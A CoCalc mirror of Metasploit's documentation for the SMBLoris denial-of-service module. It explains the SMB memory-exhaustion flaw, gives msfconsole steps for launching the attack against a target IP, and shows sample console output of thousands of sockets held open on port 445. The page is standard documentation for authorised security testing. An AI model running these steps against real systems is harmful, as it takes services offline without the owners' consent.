CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/smb/smb_loris.md
Views: 11624

Vulnerable Application

This module exploits a vulnerability in the NetBIOS Session Service Header for SMB. Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable. See the SMBLoris page for details on the vulnerability.

The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target.

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/dos/smb/smb_loris

  3. Do: set rhost [IP]

  4. Do: run

  5. Target should allocate increasing amounts of memory.

Scenarios

msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris msf auxiliary(smb_loris) > set RHOST 192.168.172.138 RHOST => 192.168.172.138 msf auxiliary(smb_loris) > msf auxiliary(smb_loris) > run [*] Starting server... [*] 192.168.172.138:445 - 100 socket(s) open [*] 192.168.172.138:445 - 200 socket(s) open ... [!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits. [*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open ...